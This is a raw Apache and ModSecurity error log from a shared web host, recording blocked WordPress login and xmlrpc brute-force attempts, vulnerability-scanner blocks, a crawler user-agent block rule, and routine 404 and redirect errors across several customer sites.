[Tue May 26 17:20:13.773452 2026] [autoindex:error] [pid 869189:tid 869440] [client 1.14.110.85:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:20:14.276835 2026] [security2:error] [pid 869189:tid 869423] [client 89.124.113.81:20143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.113.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahWI9tB5TZSn88J_oroJggAAAGc"], referer: https://bosscoirs.com/2018/06/27/defines-pith/
[Tue May 26 17:20:14.276968 2026] [security2:error] [pid 869189:tid 869423] [client 89.124.113.81:20143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahWI9tB5TZSn88J_oroJggAAAGc"], referer: https://bosscoirs.com/2018/06/27/defines-pith/
[Tue May 26 17:20:15.124430 2026] [security2:error] [pid 869189:tid 869359] [client 51.68.111.242:14405] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWI99B5TZSn88J_oroJ2gAAACc"]
[Tue May 26 17:20:15.124544 2026] [security2:error] [pid 869189:tid 869359] [client 51.68.111.242:14405] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWI99B5TZSn88J_oroJ2gAAACc"]
[Tue May 26 17:20:15.397653 2026] [security2:error] [pid 869189:tid 869397] [client 216.73.217.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWI99B5TZSn88J_oroJ7wAATTU"]
[Tue May 26 17:20:15.878721 2026] [security2:error] [pid 869189:tid 869368] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI99B5TZSn88J_oroJ9QAAADA"]
[Tue May 26 17:20:16.954407 2026] [security2:error] [pid 869189:tid 869294] [remote 103.91.67.202:40136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWI-NB5TZSn88J_oroKHQAAF2c"]
[Tue May 26 17:20:16.975770 2026] [security2:error] [pid 869189:tid 869393] [client 203.194.101.7:62932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI-NB5TZSn88J_oroKIgAAAEk"]
[Tue May 26 17:20:16.975881 2026] [security2:error] [pid 869189:tid 869393] [client 203.194.101.7:62932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWI-NB5TZSn88J_oroKIgAAAEk"]
[Tue May 26 17:20:17.572293 2026] [security2:error] [pid 869189:tid 869381] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI-dB5TZSn88J_oroKLQAAAD0"]
[Tue May 26 17:20:19.395737 2026] [security2:error] [pid 869189:tid 869434] [client 223.235.98.214:33230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI-9B5TZSn88J_oroKfgAAAHI"]
[Tue May 26 17:20:19.395906 2026] [security2:error] [pid 869189:tid 869434] [client 223.235.98.214:33230] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWI-9B5TZSn88J_oroKfgAAAHI"]
[Tue May 26 17:20:19.842385 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI-9B5TZSn88J_oroKgQAAAHg"]
[Tue May 26 17:20:23.686740 2026] [security2:error] [pid 869189:tid 869429] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWI_9B5TZSn88J_oroK5wAAAG0"]
[Tue May 26 17:20:25.214564 2026] [security2:error] [pid 869189:tid 869350] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJANB5TZSn88J_oroLGAAAAB4"]
[Tue May 26 17:20:26.842944 2026] [security2:error] [pid 869189:tid 869291] [remote 57.141.2.29:54360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 29.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-pk.php"] [unique_id "ahWJAtB5TZSn88J_oroLVQAAf2Q"]
[Tue May 26 17:20:27.478703 2026] [security2:error] [pid 869189:tid 869388] [client 203.194.101.7:63263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJA9B5TZSn88J_oroLXwAAAEQ"]
[Tue May 26 17:20:27.478810 2026] [security2:error] [pid 869189:tid 869388] [client 203.194.101.7:63263] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJA9B5TZSn88J_oroLXwAAAEQ"]
[Tue May 26 17:20:28.913654 2026] [security2:error] [pid 869189:tid 869355] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJBNB5TZSn88J_oroLhwAAACM"]
[Tue May 26 17:20:29.909392 2026] [core:error] [pid 869189:tid 869440] [client 66.249.66.43:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:20:29.909415 2026] [core:error] [pid 869189:tid 869440] [client 66.249.66.43:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:20:29.974357 2026] [security2:error] [pid 869189:tid 869322] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJBdB5TZSn88J_oroLpgAAAAI"]
[Tue May 26 17:20:30.315731 2026] [security2:error] [pid 869189:tid 869391] [client 223.235.98.214:6898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJBtB5TZSn88J_oroLxgAAAEc"]
[Tue May 26 17:20:30.316526 2026] [security2:error] [pid 869189:tid 869391] [client 223.235.98.214:6898] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJBtB5TZSn88J_oroLxgAAAEc"]
[Tue May 26 17:20:30.639329 2026] [security2:error] [pid 869189:tid 869248] [remote 5.42.158.148:45312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJBtB5TZSn88J_oroLywAALTk"]
[Tue May 26 17:20:30.690538 2026] [core:error] [pid 869189:tid 869336] [client 66.249.66.75:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:20:30.690559 2026] [core:error] [pid 869189:tid 869336] [client 66.249.66.75:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:20:32.202871 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJB9B5TZSn88J_oroL8AAAAHg"]
[Tue May 26 17:20:32.506006 2026] [security2:error] [pid 869189:tid 869447] [client 43.173.176.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWJCNB5TZSn88J_oroL_QAAAH8"]
[Tue May 26 17:20:32.689824 2026] [security2:error] [pid 869189:tid 869355] [client 157.42.23.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWJCNB5TZSn88J_oroMFQAAACM"]
[Tue May 26 17:20:32.690160 2026] [security2:error] [pid 869189:tid 869411] [client 157.42.23.188:39822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWJCNB5TZSn88J_oroMEwAAAFs"]
[Tue May 26 17:20:32.950420 2026] [security2:error] [pid 869189:tid 869396] [client 43.173.180.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWJCNB5TZSn88J_oroMHwAAAEw"]
[Tue May 26 17:20:32.990838 2026] [security2:error] [pid 869189:tid 869332] [client 14.179.52.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJCNB5TZSn88J_oroMIQAAAAw"], referer: https://www.anujtradingco.com/
[Tue May 26 17:20:33.927552 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJCdB5TZSn88J_oroMPAAAAHg"]
[Tue May 26 17:20:35.269421 2026] [security2:error] [pid 869189:tid 869402] [client 62.60.130.182:58891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJC9B5TZSn88J_oroMdQAAAFI"]
[Tue May 26 17:20:35.722938 2026] [security2:error] [pid 869189:tid 869379] [client 14.179.52.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJC9B5TZSn88J_oroMjAAAADs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1429973&moderation-hash=c0f3850d5153de53fa0099fbe67b232d
[Tue May 26 17:20:35.916298 2026] [security2:error] [pid 869189:tid 869397] [client 62.60.130.182:61330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJC9B5TZSn88J_oroMmgAAAE0"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 17:20:37.156055 2026] [security2:error] [pid 869189:tid 869438] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJDNB5TZSn88J_oroMrgAAAHY"]
[Tue May 26 17:20:37.572357 2026] [security2:error] [pid 869189:tid 869427] [client 203.194.101.7:63587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJDdB5TZSn88J_oroMxAAAAGs"]
[Tue May 26 17:20:37.572521 2026] [security2:error] [pid 869189:tid 869427] [client 203.194.101.7:63587] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJDdB5TZSn88J_oroMxAAAAGs"]
[Tue May 26 17:20:38.861354 2026] [security2:error] [pid 869189:tid 869276] [remote 163.223.13.54:52132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWJDtB5TZSn88J_oroM4AAAZFU"]
[Tue May 26 17:20:39.224530 2026] [security2:error] [pid 869189:tid 869442] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJDtB5TZSn88J_oroM6wAAAHo"]
[Tue May 26 17:20:40.190652 2026] [security2:error] [pid 869189:tid 869267] [remote 103.11.102.106:47874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWJENB5TZSn88J_oroNDQAATEw"]
[Tue May 26 17:20:40.965676 2026] [security2:error] [pid 869189:tid 869323] [client 223.235.98.214:23443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJENB5TZSn88J_oroNJgAAAAM"]
[Tue May 26 17:20:40.965848 2026] [security2:error] [pid 869189:tid 869323] [client 223.235.98.214:23443] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJENB5TZSn88J_oroNJgAAAAM"]
[Tue May 26 17:20:41.704588 2026] [security2:error] [pid 869189:tid 869326] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJEdB5TZSn88J_oroNMgAAAAY"]
[Tue May 26 17:20:42.643997 2026] [security2:error] [pid 869189:tid 869395] [client 169.149.224.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJEtB5TZSn88J_oroNRQAAAEs"]
[Tue May 26 17:20:44.113528 2026] [security2:error] [pid 869189:tid 869415] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJE9B5TZSn88J_oroNbQAAAF8"]
[Tue May 26 17:20:44.734192 2026] [security2:error] [pid 869189:tid 869334] [client 89.221.206.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJFNB5TZSn88J_oroNiwAAAA4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:20:45.909899 2026] [security2:error] [pid 869189:tid 869414] [client 89.221.206.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJFdB5TZSn88J_oroNpAAAAF4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 17:20:46.934490 2026] [security2:error] [pid 869189:tid 869379] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJFtB5TZSn88J_oroNtgAAADs"]
[Tue May 26 17:20:47.039539 2026] [security2:error] [pid 869189:tid 869333] [client 14.179.52.91:42064] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWJFtB5TZSn88J_oroNtwAAAA0"], referer: https://anujtradingco.com
[Tue May 26 17:20:47.854659 2026] [security2:error] [pid 869189:tid 869327] [client 203.194.101.7:63915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJF9B5TZSn88J_oroN1gAAAAc"]
[Tue May 26 17:20:47.854797 2026] [security2:error] [pid 869189:tid 869327] [client 203.194.101.7:63915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJF9B5TZSn88J_oroN1gAAAAc"]
[Tue May 26 17:20:48.653296 2026] [security2:error] [pid 869189:tid 869423] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJGNB5TZSn88J_oroN4QAAAGc"]
[Tue May 26 17:20:50.953252 2026] [security2:error] [pid 869189:tid 869356] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJGtB5TZSn88J_oroOJgAAACQ"]
[Tue May 26 17:20:51.448542 2026] [security2:error] [pid 869189:tid 869433] [client 223.235.98.214:12948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJG9B5TZSn88J_oroOOwAAAHE"]
[Tue May 26 17:20:51.448698 2026] [security2:error] [pid 869189:tid 869433] [client 223.235.98.214:12948] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJG9B5TZSn88J_oroOOwAAAHE"]
[Tue May 26 17:20:52.855030 2026] [security2:error] [pid 869189:tid 869380] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJHNB5TZSn88J_oroOWgAAADw"]
[Tue May 26 17:20:55.759281 2026] [security2:error] [pid 869189:tid 869419] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJH9B5TZSn88J_oroOsAAAAGM"]
[Tue May 26 17:20:57.973552 2026] [security2:error] [pid 869189:tid 869338] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJIdB5TZSn88J_oroO9QAAABI"]
[Tue May 26 17:20:58.188264 2026] [security2:error] [pid 869189:tid 869325] [client 114.119.157.37:26135] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWJItB5TZSn88J_oroPCAAAAAU"], referer: http://haddingtonwines.com/cart?remove_item=0b5e29aa1acf8bdc5d8935d7036fa4f5
[Tue May 26 17:20:58.289772 2026] [security2:error] [pid 869189:tid 869417] [client 203.194.101.7:64243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJItB5TZSn88J_oroPBwAAAGE"]
[Tue May 26 17:20:58.289929 2026] [security2:error] [pid 869189:tid 869417] [client 203.194.101.7:64243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJItB5TZSn88J_oroPBwAAAGE"]
[Tue May 26 17:21:00.385095 2026] [security2:error] [pid 869189:tid 869373] [client 74.7.175.137:42652] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahWJI9B5TZSn88J_oroPNAAANWg"]
[Tue May 26 17:21:00.394894 2026] [security2:error] [pid 869189:tid 869337] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJI9B5TZSn88J_oroPNwAAABE"]
